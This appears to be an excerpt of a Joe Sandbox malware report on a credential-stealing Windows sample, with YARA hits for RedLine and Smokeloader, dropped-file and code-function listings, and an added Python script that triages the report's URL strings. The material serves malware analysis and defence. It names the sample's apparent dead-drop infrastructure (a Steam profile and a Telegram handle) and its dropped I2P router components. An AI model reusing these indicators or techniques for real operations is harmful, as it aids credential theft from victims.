Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown HTTPS traffic detected: 23.192.247.89:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 5.75.212.60:443 -> 192.168.2.6:49714 version: TLS 1.2
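The string list above mixes ordinary browser and Steam-client artifacts with the sample's own infrastructure, and the memory-dump identifiers make it hard to see which process a URL belongs to. The following Python is an added example, not part of the Joe Sandbox report: it parses "String found in binary or memory" lines (REPORT_LINES is a trimmed excerpt of lines from this page), splits URLs that were glued together in memory (the duckduckgo favicon/search pair), groups contacted hosts by the process or dropped file they were found in, and flags two patterns a triage analyst would want separated out. First, bare public profile URLs on steamcommunity.com and t.me: Vidar is documented to use such pages as dead-drop resolvers for its real C2 address, although this report does not itself say that is what this sample does with them. Second, the I2P reseed servers, which together with i2p.conf.23.dr and the i2pd documentation URL indicate an i2pd router is dropped alongside the stealer (legit-website.com/i2pseeds.su3 is a placeholder from the i2pd sample configuration, not live infrastructure). The function names and category labels are this example's own.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Trimmed excerpt of "String found in binary or memory" lines from this report,
# embedded so the script runs offline.
REPORT_LINES = [
    "Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199747278259",
    "Source: file.exe, 00000000.00000002.2762584884.00000000040A0000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: https://t.me/armad2a",
    "Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.000000000437F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, KXEmxT2p.23.dr String found in binary or memory: https://reseed.i2pgit.org/",
    "Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr String found in binary or memory: https://legit-website.com/i2pseeds.su3",
    "Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/recaptcha/",
    "Source: file.exe, 00000000.00000003.2362409222.000000001B585000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=",
]

LINE_RE = re.compile(r"^Source: (?P<sources>.+?) String found in binary or memory: (?P<url>\S+)")
# Process names and dropped files look like "file.exe" or "KXEmxT2p.23.dr";
# the long dotted hex tokens are memory-dump ids and are skipped.
SRC_TOKEN_RE = re.compile(r"^[\w.{}\-]+\.(exe|dll|dr)$")
# Memory often concatenates adjacent strings; split wherever a new scheme starts.
GLUED_URL_RE = re.compile(r"https?://\S+?(?=https?://|$)")


def parse_line(line):
    """Return (process_tokens, urls) for one report line, or None if it is not a string hit."""
    m = LINE_RE.match(line)
    if not m:
        return None
    sources = [t.strip() for t in m.group("sources").split(",")]
    procs = sorted({t for t in sources if SRC_TOKEN_RE.match(t)})
    urls = [u.rstrip(";") for u in GLUED_URL_RE.findall(m.group("url"))]
    return procs, urls


def classify(url):
    """Assumed triage categories; a real playbook would extend these rules."""
    parts = urlsplit(url)
    host, path = parts.netloc.lower(), parts.path
    # Bare profile/channel pages: the shape Vidar uses as a dead-drop resolver.
    if host == "steamcommunity.com" and re.match(r"^/profiles/\d+/?$", path):
        return "dead_drop_resolver_candidate"
    if host == "t.me" and re.match(r"^/\w+$", path):
        return "dead_drop_resolver_candidate"
    # I2P reseed bootstrap hosts from the dropped i2pd configuration.
    if "i2p" in host or host.startswith("reseed") or path.endswith("i2pseeds.su3"):
        return "i2p_reseed"
    return "other"


def triage(lines):
    """Group URLs by category and contacted hosts by the process they were found in."""
    by_category = defaultdict(set)
    hosts_by_proc = defaultdict(set)
    for line in lines:
        parsed = parse_line(line)
        if not parsed:
            continue
        procs, urls = parsed
        for url in urls:
            by_category[classify(url)].add(url)
            host = urlsplit(url).netloc.lower()
            for proc in procs:
                hosts_by_proc[proc].add(host)
    return ({k: sorted(v) for k, v in by_category.items()},
            {k: sorted(v) for k, v in hosts_by_proc.items()})


if __name__ == "__main__":
    categories, hosts = triage(REPORT_LINES)
    for cat, urls in categories.items():
        print(cat)
        for u in urls:
            print("  ", u)
    for proc, h in hosts.items():
        print(proc, "->", ", ".join(h))
```

Run it over the full report text (one line per signature) rather than the excerpt to get the complete per-process host list; the dead-drop candidates are the ones to resolve and watch, since the profile page content, not the domain, carries the C2 address.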

System Summary

Source: 00000000.00000002.2762173907.000000000249D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2762584884.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C84B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C84B700
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C84B8C0 rand_s,NtQueryVirtualMemory, 0_2_6C84B8C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C84B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 0_2_6C84B910
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7EF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C7EF280
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FFDA38CF0FE strlen,strcat,strlen,strlen,strlen,strcat,strlen,strlen,strlen,strcat,LogonUserA,GetLastError,CreateProcessAsUserA,GetLastError,CloseHandle,CreateProcessA,GetLastError, 23_2_00007FFDA38CF0FE
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File deleted: C:\Windows\Temp\1kuzcKGx
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041BD50 0_2_0041BD50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041A130 0_2_0041A130
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00419B58 0_2_00419B58
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00419B30 0_2_00419B30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7E35A0 0_2_6C7E35A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C8434A0 0_2_6C8434A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C84C4A0 0_2_6C84C4A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7F5440 0_2_6C7F5440
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C80D4D0 0_2_6C80D4D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C826CF0 0_2_6C826CF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C85AC00 0_2_6C85AC00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C825C10 0_2_6C825C10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C832C10 0_2_6C832C10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7ED4E0 0_2_6C7ED4E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C85542B 0_2_6C85542B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7F64C0 0_2_6C7F64C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C85545C 0_2_6C85545C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7F6C80 0_2_6C7F6C80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C820DD0 0_2_6C820DD0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C8485F0 0_2_6C8485F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7FFD00 0_2_6C7FFD00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C80ED10 0_2_6C80ED10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C810512 0_2_6C810512
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C84E680 0_2_6C84E680
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7EC670 0_2_6C7EC670
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C805E90 0_2_6C805E90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C844EA0 0_2_6C844EA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C8576E3 0_2_6C8576E3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C835600 0_2_6C835600
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7EBEF0 0_2_6C7EBEF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7FFEF0 0_2_6C7FFEF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C827E10 0_2_6C827E10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C849E30 0_2_6C849E30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C804640 0_2_6C804640
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C832E4E 0_2_6C832E4E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C809E50 0_2_6C809E50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C823E50 0_2_6C823E50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C856E63 0_2_6C856E63
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C8377A0 0_2_6C8377A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C816FF0 0_2_6C816FF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7F9F00 0_2_6C7F9F00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C827710 0_2_6C827710
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7EDFE0 0_2_6C7EDFE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C8160A0 0_2_6C8160A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C8550C7 0_2_6C8550C7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C80C0E0 0_2_6C80C0E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C8258E0 0_2_6C8258E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7F7810 0_2_6C7F7810
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C82B820 0_2_6C82B820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C834820 0_2_6C834820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C808850 0_2_6C808850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C80D850 0_2_6C80D850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C82F070 0_2_6C82F070
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C825190 0_2_6C825190
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C842990 0_2_6C842990
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7FD960 0_2_6C7FD960
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C81D9B0 0_2_6C81D9B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C80A940 0_2_6C80A940
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7EC9A0 0_2_6C7EC9A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C83B970 0_2_6C83B970
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C85B170 0_2_6C85B170
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C85BA90 0_2_6C85BA90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C814AA0 0_2_6C814AA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C852AB0 0_2_6C852AB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C828AC0 0_2_6C828AC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C801AF0 0_2_6C801AF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C82E2F0 0_2_6C82E2F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7FCAB0 0_2_6C7FCAB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7E22A0 0_2_6C7E22A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C829A60 0_2_6C829A60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7FC370 0_2_6C7FC370
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7E5340 0_2_6C7E5340
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C8553C8 0_2_6C8553C8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C82D320 0_2_6C82D320
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7EF380 0_2_6C7EF380
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C88ECC0 0_2_6C88ECC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C8EECD0 0_2_6C8EECD0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C956C00 0_2_6C956C00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C96AC30 0_2_6C96AC30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C89AC60 0_2_6C89AC60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C926D90 0_2_6C926D90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C894DB0 0_2_6C894DB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA1CDC0 0_2_6CA1CDC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA18D20 0_2_6CA18D20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9BAD50 0_2_6C9BAD50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C95ED70 0_2_6C95ED70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C916E90 0_2_6C916E90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C89AEC0 0_2_6C89AEC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C930EC0 0_2_6C930EC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C970E20 0_2_6C970E20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C92EE70 0_2_6C92EE70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9D8FB0 0_2_6C9D8FB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C89EFB0 0_2_6C89EFB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C96EFF0 0_2_6C96EFF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C890FE0 0_2_6C890FE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C896F10 0_2_6C896F10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9D0F20 0_2_6C9D0F20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C8FEF40 0_2_6C8FEF40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C952F70 0_2_6C952F70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9968E0 0_2_6C9968E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C8E0820 0_2_6C8E0820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C91A820 0_2_6C91A820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C964840 0_2_6C964840
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9509B0 0_2_6C9509B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9209A0 0_2_6C9209A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C94A9A0 0_2_6C94A9A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9AC9E0 0_2_6C9AC9E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C8C49F0 0_2_6C8C49F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C8E6900 0_2_6C8E6900
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C8C8960 0_2_6C8C8960
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C90EA80 0_2_6C90EA80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C93EA00 0_2_6C93EA00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C948A30 0_2_6C948A30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C90CA70 0_2_6C90CA70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C930BA0 0_2_6C930BA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C996BE0 0_2_6C996BE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9BA480 0_2_6C9BA480
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C92A4D0 0_2_6C92A4D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C8D64D0 0_2_6C8D64D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C91A430 0_2_6C91A430
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C8F4420 0_2_6C8F4420
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C8A8460 0_2_6C8A8460
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C8845B0 0_2_6C8845B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C91E5F0 0_2_6C91E5F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C95A5E0 0_2_6C95A5E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9D8550 0_2_6C9D8550
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C8E8540 0_2_6C8E8540
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C994540 0_2_6C994540
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C930570 0_2_6C930570
Source: C:\ProgramData\BFCAAEHJDB.exe Code function: 6_2_03327B92 6_2_03327B92
Source: C:\ProgramData\BFCAAEHJDB.exe Code function: 6_2_03336BCE 6_2_03336BCE
Source: C:\ProgramData\BFCAAEHJDB.exe Code function: 6_2_03324962 6_2_03324962
Source: C:\ProgramData\BFCAAEHJDB.exe Code function: 6_2_03325956 6_2_03325956
Source: C:\ProgramData\BFCAAEHJDB.exe Code function: 6_2_0332C95A 6_2_0332C95A
Source: C:\ProgramData\BFCAAEHJDB.exe Code function: 6_2_033298AA 6_2_033298AA
Source: C:\ProgramData\BFCAAEHJDB.exe Code function: 6_2_03334F9A 6_2_03334F9A
Source: C:\ProgramData\BFCAAEHJDB.exe Code function: 6_2_03325EE6 6_2_03325EE6
Source: C:\ProgramData\BFCAAEHJDB.exe Code function: 6_2_0333CCD2 6_2_0333CCD2
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FF62094C490 23_2_00007FF62094C490
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FFDA38A08D0 23_2_00007FFDA38A08D0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FFDA38D2520 23_2_00007FFDA38D2520
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FFDAC0AEFB0 23_2_00007FFDAC0AEFB0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FFDAC0DCB60 23_2_00007FFDAC0DCB60
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FFDAC0FEAF0 23_2_00007FFDAC0FEAF0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FFDAC1063E7 23_2_00007FFDAC1063E7
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FFDAC1304B0 23_2_00007FFDAC1304B0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FFDAC128D2B 23_2_00007FFDAC128D2B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FFDAC128E16 23_2_00007FFDAC128E16
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FFDAC128F5E 23_2_00007FFDAC128F5E
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FFDAC12904C 23_2_00007FFDAC12904C
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
Source: C:\Windows\System32\icacls.exe Process token adjusted: Security
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C8B9B10 appears 31 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6CA109D0 appears 140 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C81CBE8 appears 134 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6CA1DAE0 appears 34 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 00402000 appears 287 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C8294D0 appears 90 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C8B3620 appears 35 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: String function: 00007FFDAC0F1352 appears 398 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: String function: 00007FF620942EF2 appears 314 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: String function: 00007FFDAC0D20C2 appears 356 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: String function: 00007FFDA38940D2 appears 473 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: String function: 00007FFDA38CC852 appears 526 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: String function: 00007FFDAC0A9DC2 appears 405 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: String function: 00007FFDAC1277A2 appears 388 times
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 5012 -ip 5012
Source: 1kuzcKGx.23.dr Static PE information: Number of sections : 11 > 10
Source: KXEmxT2p.23.dr Static PE information: Number of sections : 11 > 10
Source: Lx9RtFcl.23.dr Static PE information: Number of sections : 11 > 10
Source: S7evpAMe.23.dr Static PE information: Number of sections : 11 > 10
Source: samctl.dll.23.dr Static PE information: Number of sections : 11 > 10
Source: g29qQU9G.23.dr Static PE information: Number of sections : 11 > 10
Source: evtsrv.dll.23.dr Static PE information: Number of sections : 11 > 10
Source: h0yu5TYE.23.dr Static PE information: Number of sections : 11 > 10
Source: BFCAAEHJDB.exe.0.dr Static PE information: Number of sections : 11 > 10
Source: dwlmgr.dll.23.dr Static PE information: Number of sections : 11 > 10
Source: FHLBnhuN.23.dr Static PE information: Number of sections : 11 > 10
Source: cnccli.dll.23.dr Static PE information: Number of sections : 11 > 10
Source: 7847438767[1].exe.0.dr Static PE information: Number of sections : 11 > 10
Source: prgmgr.dll.23.dr Static PE information: Number of sections : 11 > 10
Source: libi2p.dll.23.dr Static PE information: Number of sections : 11 > 10
Source: fJw4qvYl.23.dr Static PE information: Number of sections : 11 > 10
Source: termsrv32.dll.23.dr Static PE information: Number of sections : 11 > 10
Source: rdpctl.dll.23.dr Static PE information: Number of sections : 11 > 10
Source: file.exe, 00000000.00000002.2788213145.000000006C872000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamefreebl3.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2761930657.0000000002461000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamesOdilesigo@ vs file.exe
Source: file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesoftokn3.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2781145830.000000003B860000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevcruntime140.dll^ vs file.exe
Source: file.exe, 00000000.00000002.2776697381.000000002F98F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemsvcp140.dll^ vs file.exe
Source: file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2788685435.000000006CA65000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe Binary or memory string: OriginalFilenamesOdilesigo@ vs file.exe
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000000.00000002.2762173907.000000000249D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2762584884.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@43/76@2/35
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C847030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 0_2_6C847030
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00411400 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,FindCloseChangeNotification, 0_2_00411400
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00410900 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,VariantClear, 0_2_00410900
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FF620942029 FindResourceA,LoadResource,GetLastError,GetLastError,GetLastError,GetLastError, 23_2_00007FF620942029
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FF620941DBC strcmp,strcmp,StartServiceCtrlDispatcherA,_read,GetLastError, 23_2_00007FF620941DBC
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\76561199747278259[1].htm
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6664:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5012
Source: C:\Windows\System32\WerFault.exe Mutant created: \BaseNamedObjects\Local\WERReportingForProcess1524
Source: C:\Windows\System32\WerFault.exe Mutant created: \BaseNamedObjects\Local\SM0:5764:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:352:120:WilError_03
